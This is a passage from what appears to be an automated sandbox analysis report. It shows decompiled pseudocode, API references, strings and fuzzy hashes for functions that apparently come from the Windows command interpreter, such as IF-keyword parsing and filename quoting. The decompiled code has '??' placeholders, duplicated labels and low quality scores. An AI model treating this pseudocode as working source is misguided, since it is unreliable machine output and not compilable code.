				if(E4A73A8A9(_t50,  *((intOrPtr*)(_t50 + 0x10))) != 0) {
					E4A73B0F9(_t50, _t53, 0, _t50);
				}
				LocalFree(_v108);
				_t46 = 0;
				goto L4;
			}

0x4a74301f
0x4a743027
0x4a74302e
0x4a743032
0x4a743036
0x4a743040
0x4a743053
0x4a74305c
0x4a74305e
0x4a743063
0x4a747c13
0x4a747c2f
0x4a747c36
0x4a747c3c
0x4a747c4c
0x4a747c4f
0x4a747c56
0x4a747c58
0x4a747c58
0x4a747c79
0x00000000
0x00000000
0x4a747c81
0x4a743090
0x4a74309e
0x4a74309e
0x4a743069
0x4a74306d
0x4a74307d
0x4a743080
0x4a743080
0x4a743088
0x4a74308e
0x00000000

APIs

FormatMessageW.KERNEL32(00001900,00000000,00000000,00000000,?,0000000A,?,?,?,?), ref: 4A74305C
LocalFree.KERNEL32(?,?,?), ref: 4A743088
_ultoa.MSVCRT ref: 4A747C13
GetACP.KERNEL32(?,000000FF,?,00000020), ref: 4A747C28
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000), ref: 4A747C3C
FormatMessageW.KERNEL32(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 4A747C75

Strings

(#, xrefs: 4A747C42
System, xrefs: 4A747C58
Application, xrefs: 4A747C4F

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
String ID: (#$Application$System
API String ID: 3377411628-593978566
Opcode ID: b5ade3e42e0b7c39598963ab43152b00db6bac2c99649e5f23d645a52bc11946
Instruction ID: 7fd1203babbd34076918cc99ae3de0d3b5e719ac60ce4920d4790cd148ff6b91
Opcode Fuzzy Hash: b5ade3e42e0b7c39598963ab43152b00db6bac2c99649e5f23d645a52bc11946
Instruction Fuzzy Hash: DB318EB2A04208ABDB20DFA1CC49DEEBBBDEB89741F114525F505EB081DB709A08CB20

Uniqueness

Uniqueness Score: -1.00%

Function 4A736640, Relevance: 15.2, APIs: 10, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E4A736640(int __ebx, void* __edx, void* __edi) {
				void* _t42;
				void* _t47;
				short* _t49;
				short* _t50;
				intOrPtr _t54;
				void* _t57;
				void* _t60;
				void* _t73;
				long _t74;
				void* _t75;
				void* _t81;
				long _t84;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				short* _t91;
				void* _t93;
				intOrPtr* _t94;
				int _t105;
				signed int _t107;

				L0:
				while(1) {
					L0:
					_t88 = __edi;
					_t87 = __edx;
					_t74 = __ebx;
					_t42 = E4A7318EB( *((intOrPtr*)(_t107 - 0x210)), 0xa);
					_t90 = _t42;
					if(_t90 == __ebx) {
						goto L27;
					}
					L3:
					E4A73654D( *((intOrPtr*)(_t107 - 0x224)), _t107 - 0x204, 0x80, _t74);
					_t47 = _t107 - 0x104;
					__imp___wcsicmp(_t47, _t107 - 0x204);
					if(_t47 != 0) {
						L13:
						_t91 = E4A7318EB(_t90, 0x3a);
						if(_t91 != _t74) {
							L23:
							_t49 = _t91;
							_t90 = _t91 + 2;
							while(1) {
								L9:
								 *((intOrPtr*)(_t107 - 0x210)) = _t49;
								if( *_t49 == 0xa) {
									break;
								}
								L7:
								if(_t49 == 0x4a768640) {
									break;
								}
								L8:
								_t49 = _t49;
							}
							L10:
							if( *_t49 != 0x3a) {
								 *((intOrPtr*)(_t107 - 0x210)) = _t49;
							}
							L12:
							_t50 = E4A732B0D(_t49, _t74);
							 *((intOrPtr*)(_t107 - 0x224)) = _t50;
							if( *_t50 == 0x3a) {
								continue;
							}
							goto L13;
						}
						L14:
						if( *0x4a7540b8 == 1) {
							L1:
							E4A733AB3( *(_t107 - 0x208));
							_t54 =  *((intOrPtr*)(_t107 - 0x218));
							_pop(_t89);
							_pop(_t93);
							_pop(_t75);
							return E4A7313A9(_t54, _t75,  *(_t107 - 4) ^ _t107, _t87, _t89, _t93);
						} else {
							goto L15;
						}
						while(1) {
							L15:
							E4A734B2A(_t48);
							_t94 = __imp___get_osfhandle;
							_t57 =  *_t94( *(_t107 - 0x208), _t74, _t74, 1);
							_pop(_t81);
							_t58 = SetFilePointer(_t57, ??, ??, ??);
							 *(_t88 + 8) = _t58;
							if(_t58 >=  *((intOrPtr*)(_t107 - 0x228)) &&  *(_t107 - 0x214) == _t74) {
							}
							L24:
							if( *(_t107 - 0x20c) != _t74) {
								L29:
								E4A7357F4(_t58, _t88);
								L40:
								 *0x4a7540b4 =  *((intOrPtr*)(_t88 + 0x110));
								E4A736D44(_t81, 0x400023ab, 1, _t107 - 0x104);
								 *((intOrPtr*)(_t107 - 0x218)) = 1;
								goto L1;
							}
							L25:
							if( *(_t107 - 0x214) == _t74) {
								goto L29;
							}
							L26:
							_t48 = SetFilePointer( *_t94(_t74),  *(_t107 - 0x208), _t74, _t74);
							 *(_t107 - 0x214) = _t74;
							while(1) {
								L15:
								E4A734B2A(_t48);
								_t94 = __imp___get_osfhandle;
								_t57 =  *_t94( *(_t107 - 0x208), _t74, _t74, 1);
								_pop(_t81);
								_t58 = SetFilePointer(_t57, ??, ??, ??);
								 *(_t88 + 8) = _t58;
								if(_t58 >=  *((intOrPtr*)(_t107 - 0x228)) &&  *(_t107 - 0x214) == _t74) {
								}
								goto L17;
							}
							goto L24;
							L17:
							_t60 =  *_t94( *(_t107 - 0x208), 0x4a768640, 0x200, _t107 - 0x20c);
							_pop(_t81);
							_push(_t60);
							if(E4A7367D3() == 0) {
								goto L24;
							}
							L18:
							_t58 =  *(_t107 - 0x20c);
							if(_t58 == _t74) {
								goto L25;
							}
							L19:
							if(_t58 == 0xffffffff ||  *0x4a768640 == _t74 ||  *((intOrPtr*)(_t107 - 0x104)) == _t74) {
								goto L24;
							} else {
								L22:
								0x4a768640[_t58] = 0;
								_t91 = E4A7318EB(0x4a768640, 0x3a);
								if(_t91 == _t74) {
									continue;
								}
								goto L23;
							}
						}
					}
					L4:
					 *0x4a7540b8 =  *( *((intOrPtr*)(_t107 - 0x220)) + 0x40) & 0x00000001;
					_t48 = E4A73661C();
					if(_t90 == _t74) {
						L34:
						if(_t48 == 0) {
							L36:
							_t48 =  *(_t107 - 0x20c);
							L39:
							 *(_t88 + 8) =  *(_t88 + 8) + _t48;
							goto L14;
						}
						L35:
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push( *(_t107 - 0x20c));
						_push(0x4a768640);
						L38:
						_t48 = WideCharToMultiByte( *0x4a7541b8, _t74, ??, ??, ??, ??, ??, ??);
						goto L39;
					}
					L5:
					if(_t48 != 0) {
						L37:
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push(_t90 - 0x4a768640 + 2 >> 1);
						_push(0x4a768640);
						goto L38;
					}
					L6:
					 *(_t88 + 8) =  *(_t88 + 8) + (_t90 - 0x4a768640 + 2 >> 1);
					goto L14;
					L27:
					__imp___get_osfhandle(1);
					if(SetFilePointer(_t42,  *(_t107 - 0x208), __ebx, __ebx) ==  *((intOrPtr*)(_t107 - 0x21c))) {
						goto L3;
					}
					L28:
					L30:
					_t84 =  *(_t107 - 0x20c);
					if(_t84 == 0x200) {
						goto L3;
					}
					L31:
					_t105 = _t84 - ( *((intOrPtr*)(_t107 - 0x210)) - 0x4a768640 >> 1);
					_t73 = E4A73661C();
					if(_t73 != 0) {
						_t73 = WideCharToMultiByte( *0x4a7541b8, __ebx, 0x4a768640, _t105, __ebx, __ebx, __ebx, __ebx);
						_t105 = _t73;
					}
					L33:
					__imp___get_osfhandle(1);
					_t48 = SetFilePointer(_t73,  *(_t107 - 0x208),  ~_t105, _t74);
					goto L14;
				}
			}

0x4a736640
0x4a736640
0x4a736640
0x4a736640
0x4a736640
0x4a736640
0x4a736648
0x4a73664d
0x4a736651
0x00000000
0x00000000
0x4a736657
0x4a73666a
0x4a736676
0x4a73667d
0x4a736687
0x4a7366f7
0x4a7366ff
0x4a736703
0x4a7367c5
0x4a7367c5
0x4a7367c8
0x4a7366c6
0x4a7366c6
0x4a7366ca
0x4a7366d0
0x00000000
0x00000000
0x4a7366bd
0x4a7366c2
0x00000000
0x00000000
0x4a7366c4
0x4a7366c5
0x4a7366c5
0x4a7366d2
0x4a7366d6
0x4a7366da
0x4a7366da
0x4a7366e0
0x4a7366e2
0x4a7366eb
0x4a7366f1
0x00000000
0x00000000
0x00000000
0x4a7366f1
0x4a736709
0x4a736710
0x4a736526
0x4a73652c
0x4a736531
0x4a73653a
0x4a73653b
0x4a73653e
0x4a736545
0x00000000
0x00000000
0x00000000
0x4a736716
0x4a736716
0x4a736716
0x4a73671b
0x4a73672b
0x4a73672d
0x4a73672f
0x4a73673b
0x4a73673e
0x4a73673e
0x4a73f3fa
0x4a73f400
0x4a7401de
0x4a7401df
0x4a7447c7
0x4a7447cd
0x4a7447e2
0x4a7447ea
0x00000000
0x4a7447ea
0x4a73f406
0x4a73f40c
0x00000000
0x00000000
0x4a73f412
0x4a73f41f
0x4a73f425
0x4a736716
0x4a736716
0x4a736716
0x4a73671b
0x4a73672b
0x4a73672d
0x4a73672f
0x4a73673b
0x4a73673e
0x4a73673e
0x00000000
0x4a73673e
0x00000000
0x4a73674c
0x4a736763
0x4a736765
0x4a736766
0x4a73676e
0x00000000
0x00000000
0x4a736774
0x4a736774
0x4a73677c
0x00000000
0x00000000
0x4a736782
0x4a736785
0x00000000
0x4a7367a5
0x4a7367a5
0x4a7367ae
0x4a7367bb
0x4a7367bf
0x00000000
0x00000000
0x00000000
0x4a7367bf
0x4a736785
0x4a736716
0x4a736689
0x4a736694
0x4a736699
0x4a7366a0
0x4a744784
0x4a744786
0x4a744799
0x4a744799
0x4a7447bf
0x4a7447bf
0x00000000
0x4a7447bf
0x4a744788
0x4a744788
0x4a744789
0x4a74478a
0x4a74478b
0x4a74478c
0x4a744792
0x4a7447b2
0x4a7447b9
0x00000000
0x4a7447b9
0x4a7366a6
0x4a7366a8
0x4a7447a1
0x4a7447a1
0x4a7447a9
0x4a7447ab
0x4a7447ad
0x4a7447b0
0x4a7447b1
0x00000000
0x4a7447b1
0x4a7366ae
0x4a7366b8
0x00000000
0x4a7401ad
0x4a7401b7
0x4a7401cb
0x00000000
0x00000000
0x4a7401d1
0x4a744720
0x4a744720
0x4a74472c
0x00000000
0x00000000
0x4a744732
0x4a744741
0x4a744743
0x4a74474a
0x4a74475d
0x4a744763
0x4a744763
0x4a744765
0x4a744771
0x4a744779
0x00000000
0x4a744779

APIs

Part of subcall function 4A7318EB: wcschr.MSVCRT ref: 4A731900

_wcsicmp.MSVCRT ref: 4A73667D
_get_osfhandle.MSVCRT ref: 4A73672B
SetFilePointer.KERNEL32(00000000), ref: 4A73672F
_get_osfhandle.MSVCRT ref: 4A736763
_get_osfhandle.MSVCRT ref: 4A7401B7
SetFilePointer.KERNEL32(00000000,?,00000001,?,0000000A), ref: 4A7401BF
WideCharToMultiByte.KERNEL32(?,4A768640,?,?,?,?,?,?,00000001,?,0000000A), ref: 4A74475D
_get_osfhandle.MSVCRT ref: 4A744771
SetFilePointer.KERNEL32(00000000,00000001,?,00000001,?,0000000A), ref: 4A744779
WideCharToMultiByte.KERNEL32(?,4A768640,?,?,?,?,?,00000001,?,0000000A), ref: 4A7447B9

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _get_osfhandle$FilePointer$ByteCharMultiWide$_wcsicmpwcschr
String ID:
API String ID: 147692262-0
Opcode ID: 8eeac93ef456bb36975cf4ee2eaeae8720c7f93e0633a9b654da678f2fe44a69
Instruction ID: 154fcfce560bf44f7e5a49fc994fe079a2974096b758244a8f2a95b80959679b
Opcode Fuzzy Hash: 8eeac93ef456bb36975cf4ee2eaeae8720c7f93e0633a9b654da678f2fe44a69
Instruction Fuzzy Hash: C051C2B2949629ABDF705B60CCCDBEA7F7DEB012A4F124190E905E6092D7708D89CB60

Uniqueness

Uniqueness Score: -1.00%

Function 4A73617F, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E4A73617F(void* __ecx, intOrPtr _a4) {
				void* __ebp;
				intOrPtr* _t5;
				char _t6;
				intOrPtr _t9;
				char _t11;
				char _t12;
				char _t17;
				char _t18;
				intOrPtr* _t19;
				void* _t21;
				void* _t27;
				void* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t21 = __ecx;
				if(E4A731CBF(0) != 0x4000) {
					E4A74EE72();
				}
				_t5 = E4A7329E9(_t21, 0);
				_t36 = __imp___wcsicmp;
				_t19 = _t5;
				_t6 =  *_t36(L"ERRORLEVEL", 0x4a768640, _t32, _t35, _t19);
				__eflags = _t6;
				if(_t6 == 0) {
					 *_t19 = 0x35;
					goto L2;
				} else {
					_t11 =  *_t36(L"EXIST", 0x4a768640);
					__eflags = _t11;
					if(_t11 == 0) {
						 *_t19 = 0x37;
						L2:
						_t9 = E4A7322CA(E4A733D56(0), 0, 0);
						L12:
						 *((intOrPtr*)(_t19 + 0x3c)) = _t9;
						L11:
						return _t19;
					}
					__eflags =  *0x4a754081;
					if( *0x4a754081 == 0) {
						L9:
						_t12 =  *_t36("NOT", 0x4a768640);
						_pop(_t27);
						__eflags = _t12;
						if(_t12 == 0) {
							__eflags = _a4 - _t12;
							if(_a4 != _t12) {
								E4A74EE72();
							}
							 *_t19 = 0x38;
							_t9 = E4A73617F(_t27, 1);
							goto L12;
						}
						__eflags = 0;
						E4A731D26(0, 0, 0, 0);
						 *_t19 = 0x39;
						E4A736262(__eflags, _t19);
						goto L11;
					}
					_t17 =  *_t36(L"CMDEXTVERSION", 0x4a768640);
					__eflags = _t17;
					if(_t17 == 0) {
						 *_t19 = 0x34;
						goto L2;
					}
					__eflags =  *0x4a754081;
					if( *0x4a754081 == 0) {
						goto L9;
					}
					_t18 =  *_t36(L"DEFINED", 0x4a768640);
					__eflags = _t18;
					if(_t18 == 0) {
						goto L1;
					}
					goto L9;
				}
				L1:
				 *_t19 = 0x36;
				goto L2;
			}

0x4a73617f
0x4a736190
0x4a747e66
0x4a747e66
0x4a73619b
0x4a7361a0
0x4a7361b1
0x4a7361b3
0x4a7361b7
0x4a7361b9
0x4a747e70
0x00000000
0x4a7361bf
0x4a7361c5
0x4a7361c9
0x4a7361cb
0x4a736afe
0x4a7353ef
0x4a7353fa
0x4a736234
0x4a736234
0x4a73622b
0x4a736231
0x4a736231
0x4a7361d1
0x4a7361d8
0x4a736207
0x4a73620d
0x4a736210
0x4a736211
0x4a736213
0x4a736239
0x4a73623c
0x4a747e86
0x4a747e86
0x4a736244
0x4a73624a
0x00000000
0x4a73624a
0x4a736215
0x4a73621a
0x4a736220
0x4a736226
0x00000000
0x4a736226
0x4a7361e0
0x4a7361e4
0x4a7361e6
0x4a747e7b
0x00000000
0x4a747e7b
0x4a7361ec
0x4a7361f3
0x00000000
0x00000000
0x4a7361fb
0x4a7361ff
0x4a736201
0x00000000
0x00000000
0x00000000
0x4a736201
0x4a73466c
0x4a73466c
0x00000000

APIs

_wcsicmp.MSVCRT ref: 4A7361B3
_wcsicmp.MSVCRT ref: 4A7361C5
_wcsicmp.MSVCRT ref: 4A7361E0
_wcsicmp.MSVCRT ref: 4A7361FB
_wcsicmp.MSVCRT ref: 4A73620D

Strings

EXIST, xrefs: 4A7361C0
ERRORLEVEL, xrefs: 4A7361AC
CMDEXTVERSION, xrefs: 4A7361DB
NOT, xrefs: 4A736208
DEFINED, xrefs: 4A7361F6

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
API String ID: 2081463915-1668778490
Opcode ID: 40cba58a28c3dc040b70a60ca8b8aaa03d6ed5c1216430e37e32203bfecb160a
Instruction ID: 63a67d1133adfdda93cbe9bc9c7009f91f99872eb5407a1a26d684e28210ce50
Opcode Fuzzy Hash: 40cba58a28c3dc040b70a60ca8b8aaa03d6ed5c1216430e37e32203bfecb160a
Instruction Fuzzy Hash: 3821D3B151DA62B9FB711BA6DC84F576EDCCB822A0F134067E600CD483DAA5C50CC73A

Uniqueness

Uniqueness Score: -1.00%

Function 4A7514FD, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 328
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E4A7514FD(void* __ecx, void* __edx, void* _a4, signed int _a8, intOrPtr _a12, signed int _a15, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				signed int _v16;
				int _v20;
				void* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _v68;
				void* _v72;
				short _v74;
				short _v76;
				void* _v80;
				short _v82;
				short _v84;
				void* _v88;
				short _v90;
				short _v92;
				void* _v96;
				short _v98;
				short _v100;
				void* _v104;
				short _v106;
				short _v108;
				void* _v112;
				short _v114;
				short _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				void* _t108;
				int _t118;
				void* _t121;
				intOrPtr* _t132;
				signed int _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				short _t147;
				void _t148;
				long _t151;
				long _t153;
				signed int _t154;
				void* _t158;
				signed int _t159;
				intOrPtr _t160;
				int _t161;
				int _t163;
				void* _t165;
				intOrPtr _t166;
				intOrPtr* _t169;
				intOrPtr* _t170;
				intOrPtr _t171;
				void* _t174;
				signed short _t182;
				void* _t183;
				intOrPtr* _t184;
				intOrPtr* _t185;
				void* _t186;
				signed short* _t196;
				signed int _t197;
				signed int _t199;
				signed short* _t204;
				int _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				signed int _t209;
				void* _t210;
				void* _t211;
				short* _t212;
				intOrPtr _t215;
				intOrPtr _t216;
				void* _t218;

				_t183 = __edx;
				_t165 = __ecx;
				_v116 = 0;
				_v114 = 0;
				_t159 = 0;
				_v132 = 0;
				_v128 = 0;
				_v124 = 0;
				_v120 = 0;
				asm("stosd");
				_v108 = 0;
				_v106 = 0;
				asm("stosd");
				_v100 = 0;
				_v98 = 0;
				asm("stosd");
				_v92 = 0;
				_v90 = 0;
				asm("stosd");
				_v84 = 0;
				_v82 = 0;
				asm("stosd");
				_v76 = 0;
				_v74 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E4A7435BA(0);
				_t108 = E4A732041(0x2c);
				_t203 = _t108;
				 *((intOrPtr*)(_t108 + 8)) = 0x800;
				_v12 = 0;
				_t219 = _a12;
				if(_a12 != 0) {
					_push(0x10);
					_pop(0);
					_v12 = 0;
				}
				E4A73B210(_t183, _t219, _a4,  &_v132);
				_t220 = _v56 - _t159;
				if(_v56 == _t159 || E4A739662(_t165, _t183, _t220, _v56) == 1 || E4A73A005( &_v132, _t159, 1,  &_v8) == 1 || E4A739AD4(_t183, _v8, _t203, 0, _v12, _t159, _t159, _t159, _t159, _t159, _t159) != 0) {
					L58:
					E4A73963C();
					__eflags = 0;
					return 0;
				} else {
					_t166 = _v8;
					_t118 =  *(_t166 + 0x14);
					if(_t118 != _t159) {
						qsort( *(_t166 + 0x1c), _t118, 4, E4A750BD5);
						_t218 = _t218 + 0x10;
					}
					_t204 = _a4;
					_t196 = _t204;
					_a15 = _t159;
					if(_a8 <= _t159) {
						L20:
						 *_t204 = 0;
						_t205 =  *(_v8 + 0x14);
						_v20 = _t205;
						_t121 = calloc(4, _t205);
						 *0x4a7706c0 = _t121;
						if(_t121 == _t159) {
							goto L58;
						}
						_t197 = 0;
						_v12 = 0;
						_a8 = _t159;
						if(_t205 <= _t159) {
							L57:
							E4A73142E( *((intOrPtr*)(_v8 + 0x18)));
							E4A73142E( *((intOrPtr*)(_v8 + 4)));
							E4A73142E(_v8);
							E4A73963C();
							return _a8;
						} else {
							goto L22;
						}
						do {
							L22:
							_t132 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _t197 * 4)) + 0x30;
							_t184 = E4A732EC4;
							_t169 = _t132;
							while(1) {
								_t206 =  *_t169;
								if(_t206 !=  *_t184) {
									break;
								}
								if(_t206 == _t159) {
									L27:
									_t169 = 0;
									L29:
									if(_t169 == _t159) {
										goto L56;
									}
									_t185 = E4A732EBC;
									_t170 = _t132;
									while(1) {
										_t207 =  *_t170;
										if(_t207 !=  *_t185) {
											break;
										}
										if(_t207 == _t159) {
											L35:
											_t170 = 0;
											L37:
											if(_t170 == _t159) {
												goto L56;
											}
											_t186 = _t132 + 2;
											do {
												_t171 =  *_t132;
												_t132 = _t132 + 2;
											} while (_t171 != _t159);
											_t160 = _a16;
											_t135 = _t132 - _t186 >> 1;
											_v16 = _t135;
											_t209 = _a8 << 2;
											_t137 = calloc(_t135 + _t160 + 4, 2);
											_t174 =  *0x4a7706c0; // 0x0
											 *(_t174 + _t209) = _t137;
											_t138 =  *0x4a7706c0; // 0x0
											if( *((intOrPtr*)(_t138 + _t209)) == 0) {
												L55:
												_t159 = 0;
												__eflags = 0;
												goto L56;
											}
											if(_a15 != 0) {
												_t199 = 0;
												__eflags = 0;
												L49:
												__eflags = _a15;
												_t139 =  *0x4a7706c0; // 0x0
												_t210 =  *(_t139 + _t209);
												if(_a15 != 0) {
													_t148 = 0x22;
													 *_t210 = _t148;
													_t210 = _t210 + 2;
													__eflags = _t210;
												}
												_t161 = _t160 + _t160;
												memcpy(_t210, _a4, _t161);
												_t211 = _t210 + _t161;
												_t163 = _v16 + _v16;
												memcpy(_t211,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4)) + 0x30, _t163);
												_t218 = _t218 + 0x18;
												_t212 = _t211 + _t163;
												__eflags = _a15;
												if(_a15 != 0) {
													_t147 = 0x22;
													 *_t212 = _t147;
													_t212 = _t212 + 2;
													__eflags = _t199;
													if(_t199 != 0) {
														_a15 = 0;
													}
												}
												_t94 =  &_a8;
												 *_t94 = _a8 + 1;
												__eflags =  *_t94;
												 *_t212 = 0;
												goto L55;
											}
											_t199 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _t197 * 4)) + 0x30;
											while(1) {
												_t151 =  *_t199 & 0x0000ffff;
												if(_t151 == 0) {
													goto L49;
												}
												if(wcschr(L" &()[]{}^=;!%\'+,`~", _t151) != 0) {
													_a15 = 1;
												}
												_t199 = _t199 + 2;
											}
											goto L49;
										}
										_t215 =  *((intOrPtr*)(_t170 + 2));
										_t68 = _t185 + 2; // 0x2e
										if(_t215 !=  *_t68) {
											break;
										}
										_t170 = _t170 + 4;
										_t185 = _t185 + 4;
										if(_t215 != _t159) {
											continue;
										}
										goto L35;
									}
									asm("sbb ecx, ecx");
									asm("sbb ecx, 0xffffffff");
									goto L37;
								}
								_t216 =  *((intOrPtr*)(_t169 + 2));
								_t66 = _t184 + 2; // 0x5c0000
								if(_t216 !=  *_t66) {
									break;
								}
								_t169 = _t169 + 4;
								_t184 = _t184 + 4;
								if(_t216 != _t159) {
									continue;
								}
								goto L27;
							}
							asm("sbb ecx, ecx");
							asm("sbb ecx, 0xffffffff");
							goto L29;
							L56:
							_t197 = _v12 + 1;
							__eflags = _t197 - _v20;
							_v12 = _t197;
						} while (_t197 < _v20);
						goto L57;
					} else {
						do {
							_t153 =  *_t196 & 0x0000ffff;
							if(_t153 == 0) {
								break;
							}
							if(_t153 != 0x22) {
								_t154 = wcschr(L" &()[]{}^=;!%\'+,`~", _t153);
								__eflags = _t154;
								if(_t154 != 0) {
									_a15 = 1;
								}
								 *_t204 =  *_t196;
								_t204 =  &(_t204[1]);
								_t196 =  &(_t196[1]);
								_t159 = _t159 + 2;
								__eflags = _t159;
							} else {
								_t158 = 2;
								_t159 = _t159 + _t158;
								_t196 = _t196 + _t158;
								_a15 = 1;
								if(_a16 >= _t159 >> 1) {
									_a16 = _a16 - 1;
								}
								if( *_t196 == 0x22) {
									_t182 = 0x22;
									 *_t204 = _t182;
									_t204 = _t204 + _t158;
									_t196 = _t196 + _t158;
									_t159 = _t159 + _t158;
								}
							}
						} while (_t159 >> 1 < _a8);
						_t159 = 0;
						goto L20;
					}
				}
			}

0x4a7514fd
0x4a7514fd
0x4a75150a
0x4a75150e
0x4a751513
0x4a751515
0x4a751518
0x4a75151b
0x4a75151e
0x4a751526
0x4a751527
0x4a75152b
0x4a751532
0x4a751533
0x4a751537
0x4a75153e
0x4a75153f
0x4a751543
0x4a75154a
0x4a75154b
0x4a75154f
0x4a751556
0x4a751557
0x4a75155b
0x4a751562
0x4a751566
0x4a751567
0x4a751568
0x4a75156b
0x4a75156e
0x4a751571
0x4a751574
0x4a751577
0x4a75157a
0x4a751582
0x4a751583
0x4a751584
0x4a751585
0x4a75158c
0x4a751591
0x4a751595
0x4a75159c
0x4a75159f
0x4a7515a2
0x4a7515a4
0x4a7515a6
0x4a7515a7
0x4a7515a7
0x4a7515b1
0x4a7515b6
0x4a7515b9
0x4a751864
0x4a751864
0x4a751869
0x00000000
0x4a751604
0x4a751604
0x4a751607
0x4a75160c
0x4a751619
0x4a75161f
0x4a75161f
0x4a751625
0x4a751628
0x4a75162a
0x4a75162d
0x4a751695
0x4a751697
0x4a75169d
0x4a7516a3
0x4a7516a6
0x4a7516ae
0x4a7516b5
0x00000000
0x00000000
0x4a7516bb
0x4a7516bf
0x4a7516c2
0x4a7516c5
0x4a75183c
0x4a751842
0x4a75184d
0x4a751855
0x4a75185a
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7516cb
0x4a7516cb
0x4a7516d4
0x4a7516d7
0x4a7516dc
0x4a7516de
0x4a7516de
0x4a7516e4
0x00000000
0x00000000
0x4a7516e9
0x4a751700
0x4a751700
0x4a751709
0x4a75170b
0x00000000
0x00000000
0x4a751711
0x4a751716
0x4a751718
0x4a751718
0x4a75171e
0x00000000
0x00000000
0x4a751723
0x4a75173a
0x4a75173a
0x4a751743
0x4a751745
0x00000000
0x00000000
0x4a75174b
0x4a75174e
0x4a75174e
0x4a751752
0x4a751753
0x4a751758
0x4a751760
0x4a751762
0x4a75176c
0x4a75176f
0x4a751777
0x4a75177d
0x4a751780
0x4a751789
0x4a75182a
0x4a75182a
0x4a75182a
0x00000000
0x4a75182a
0x4a751793
0x4a7517c5
0x4a7517c5
0x4a7517c7
0x4a7517c7
0x4a7517cb
0x4a7517d0
0x4a7517d3
0x4a7517d7
0x4a7517d8
0x4a7517dc
0x4a7517dc
0x4a7517dc
0x4a7517dd
0x4a7517e4
0x4a7517f5
0x4a7517fa
0x4a751802
0x4a751807
0x4a75180a
0x4a75180c
0x4a751810
0x4a751814
0x4a751815
0x4a751819
0x4a75181a
0x4a75181c
0x4a75181e
0x4a75181e
0x4a75181c
0x4a751824
0x4a751824
0x4a751824
0x4a751827
0x00000000
0x4a751827
0x4a75179e
0x4a7517bb
0x4a7517bb
0x4a7517c1
0x00000000
0x00000000
0x4a7517b3
0x4a7517b5
0x4a7517b5
0x4a7517ba
0x4a7517ba
0x00000000
0x4a7517bb
0x4a751725
0x4a751729
0x4a75172d
0x00000000
0x00000000
0x4a75172f
0x4a751732
0x4a751738
0x00000000
0x00000000
0x00000000
0x4a751738
0x4a75173e
0x4a751740
0x00000000
0x4a751740
0x4a7516eb
0x4a7516ef
0x4a7516f3
0x00000000
0x00000000
0x4a7516f5
0x4a7516f8
0x4a7516fe
0x00000000
0x00000000
0x00000000
0x4a7516fe
0x4a751704
0x4a751706
0x00000000
0x4a75182c
0x4a75182f
0x4a751830
0x4a751833
0x4a751833
0x00000000
0x4a75162f
0x4a75162f
0x4a75162f
0x4a751635
0x00000000
0x00000000
0x4a75163b
0x4a75166e
0x4a751676
0x4a751678
0x4a75167a
0x4a75167a
0x4a751681
0x4a751685
0x4a751687
0x4a751689
0x4a751689
0x4a75163d
0x4a75163f
0x4a751640
0x4a751646
0x4a75164b
0x4a75164f
0x4a751651
0x4a751651
0x4a751658
0x4a75165c
0x4a75165d
0x4a751660
0x4a751662
0x4a751664
0x4a751664
0x4a751658
0x4a75168e
0x4a751693
0x00000000
0x4a751693
0x4a75162d

APIs

qsort.MSVCRT ref: 4A751619
wcschr.MSVCRT ref: 4A75166E
calloc.MSVCRT ref: 4A7516A6
calloc.MSVCRT ref: 4A75176F
wcschr.MSVCRT ref: 4A7517A9
memcpy.MSVCRT ref: 4A7517E4
memcpy.MSVCRT ref: 4A751802

Strings

&()[]{}^=;!%'+,`~, xrefs: 4A751669, 4A7517A4

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: callocmemcpywcschr$qsort
String ID: &()[]{}^=;!%'+,`~
API String ID: 1104559731-381716982
Opcode ID: 8b5a709522340c0bdd53a099d22d7c9ac7146a7f172bd515a21bb05791daa090
Instruction ID: b2e2cea4fbd06007646ad1a75b6cf35dbc624e60fb64cec1ec4381861ceeeef1
Opcode Fuzzy Hash: 8b5a709522340c0bdd53a099d22d7c9ac7146a7f172bd515a21bb05791daa090
